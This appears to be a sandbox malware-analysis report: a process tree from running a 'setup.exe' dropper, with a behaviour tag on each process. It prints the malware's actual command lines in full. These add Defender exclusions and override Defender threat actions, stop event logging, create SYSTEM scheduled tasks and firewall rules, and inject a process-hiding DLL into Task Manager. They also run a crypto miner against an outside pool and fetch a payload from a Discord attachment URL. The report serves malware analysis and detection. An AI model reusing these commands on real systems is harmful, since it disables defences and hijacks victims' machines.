Processes
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"1⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\SimpleAdobe\K3WDl2xWvNNnkfn4nYdQExzq.exeC:\Users\Admin\Documents\SimpleAdobe\K3WDl2xWvNNnkfn4nYdQExzq.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\SimpleAdobe\s4AaUwLl6DEajYQi5WVeMPx0.exeC:\Users\Admin\Documents\SimpleAdobe\s4AaUwLl6DEajYQi5WVeMPx0.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\SimpleAdobe\gNaZnn5CLFQicjVhsTk8gKef.exeC:\Users\Admin\Documents\SimpleAdobe\gNaZnn5CLFQicjVhsTk8gKef.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS94F8.tmp\Install.exe.\Install.exe /IExpbdidepGR "525403" /S3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bXvtwaJkKQEzfXjvnG" /SC once /ST 18:50:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa\EDHrMUSPJvyJNvL\MczRWBv.exe\" Mv /aqsite_idVVm 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\SimpleAdobe\4dLTrXqtftUhIwJTRyHSSejV.exeC:\Users\Admin\Documents\SimpleAdobe\4dLTrXqtftUhIwJTRyHSSejV.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Users\Admin\Documents\SimpleAdobe\e02CHlRDyVx8CisrSUbTQs_u.exeC:\Users\Admin\Documents\SimpleAdobe\e02CHlRDyVx8CisrSUbTQs_u.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\SimpleAdobe\oqnIhEuqPWFLxfGfy_cozJKr.exeC:\Users\Admin\Documents\SimpleAdobe\oqnIhEuqPWFLxfGfy_cozJKr.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 21204⤵
- Program crash
-
C:\Users\Admin\Documents\SimpleAdobe\kN3Wu8RUu2uTrcf2g49JbbJI.exeC:\Users\Admin\Documents\SimpleAdobe\kN3Wu8RUu2uTrcf2g49JbbJI.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\SimpleAdobe\D3wSlOtntlkjBD387yaruAqa.exeC:\Users\Admin\Documents\SimpleAdobe\D3wSlOtntlkjBD387yaruAqa.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2868 -s 21004⤵
- Program crash
-
C:\Users\Admin\Documents\SimpleAdobe\QcMIl6J7oMLzdIxc7BHVgaQ9.exeC:\Users\Admin\Documents\SimpleAdobe\QcMIl6J7oMLzdIxc7BHVgaQ9.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\SimpleAdobe\kwI5msI0GXCECMxCfATKQ50A.exeC:\Users\Admin\Documents\SimpleAdobe\kwI5msI0GXCECMxCfATKQ50A.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4320 -s 21803⤵
- Program crash
-
C:\Users\Admin\Documents\SimpleAdobe\P1i57rTqyYvK8Wz1_NY_lX0m.exeC:\Users\Admin\Documents\SimpleAdobe\P1i57rTqyYvK8Wz1_NY_lX0m.exe2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 7563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 7643⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 7843⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 7443⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 9643⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 9963⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 13323⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "P1i57rTqyYvK8Wz1_NY_lX0m.exe" /f & erase "C:\Users\Admin\Documents\SimpleAdobe\P1i57rTqyYvK8Wz1_NY_lX0m.exe" & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "P1i57rTqyYvK8Wz1_NY_lX0m.exe" /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 13763⤵
- Program crash
-
C:\Users\Admin\Documents\SimpleAdobe\GIRYqcKiZvhmj93nqNmYBOcU.exeC:\Users\Admin\Documents\SimpleAdobe\GIRYqcKiZvhmj93nqNmYBOcU.exe2⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\SimpleAdobe\tuZctSq25Sx46OCwloIdBXYG.exeC:\Users\Admin\Documents\SimpleAdobe\tuZctSq25Sx46OCwloIdBXYG.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\SimpleAdobe\tuZctSq25Sx46OCwloIdBXYG.exe"C:\Users\Admin\Documents\SimpleAdobe\tuZctSq25Sx46OCwloIdBXYG.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll5⤵
- Executes dropped EXE
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"5⤵
- Executes dropped EXE
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:805⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exeC:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id 302ba536-1ae5-4d2c-9640-436ebe72234f --tls --nicehash -o showlock.net:443 --rig-id 302ba536-1ae5-4d2c-9640-436ebe72234f --tls --nicehash -o showlock.net:80 --rig-id 302ba536-1ae5-4d2c-9640-436ebe72234f --nicehash --http-port 3433 --http-access-token 302ba536-1ae5-4d2c-9640-436ebe72234f --randomx-wrmsr=-16⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe -hide 49446⤵
- Executes dropped EXE
- Manipulates WinMon driver.
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exeC:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exeC:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe5⤵
- Executes dropped EXE
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\SimpleAdobe\9YVd8Opjg5kP29QMElKldZkn.exeC:\Users\Admin\Documents\SimpleAdobe\9YVd8Opjg5kP29QMElKldZkn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-OR2A4.tmp\is-VK0NS.tmp"C:\Users\Admin\AppData\Local\Temp\is-OR2A4.tmp\is-VK0NS.tmp" /SL4 $601F0 "C:\Users\Admin\Documents\SimpleAdobe\9YVd8Opjg5kP29QMElKldZkn.exe" 4119408 522243⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Three Kingsoft Video\threekingsoftvideo.exe"C:\Users\Admin\AppData\Local\Three Kingsoft Video\threekingsoftvideo.exe" -i4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Three Kingsoft Video\threekingsoftvideo.exe"C:\Users\Admin\AppData\Local\Three Kingsoft Video\threekingsoftvideo.exe" -s4⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\SimpleAdobe\NYulW0N4e1hPawIOp4plsa35.exeC:\Users\Admin\Documents\SimpleAdobe\NYulW0N4e1hPawIOp4plsa35.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "OBGPQMHF"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "OBGPQMHF"3⤵
- Launches sc.exe
-
C:\Users\Admin\Documents\SimpleAdobe\f5VHEXNHF974Dhcz8BdyX288.exeC:\Users\Admin\Documents\SimpleAdobe\f5VHEXNHF974Dhcz8BdyX288.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
-
C:\Users\Admin\Documents\SimpleAdobe\f5VHEXNHF974Dhcz8BdyX288.exe"C:\Users\Admin\Documents\SimpleAdobe\f5VHEXNHF974Dhcz8BdyX288.exe"3⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1368 -ip 13681⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1368 -ip 13681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1368 -ip 13681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2868 -ip 28681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1368 -ip 13681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1368 -ip 13681⤵
-
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exeC:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵
-
C:\Windows\system32\svchost.exesvchost.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1368 -ip 13681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4320 -ip 43201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1368 -ip 13681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4308 -ip 43081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1368 -ip 13681⤵
-
C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa\EDHrMUSPJvyJNvL\MczRWBv.exeC:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa\EDHrMUSPJvyJNvL\MczRWBv.exe Mv /aqsite_idVVm 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
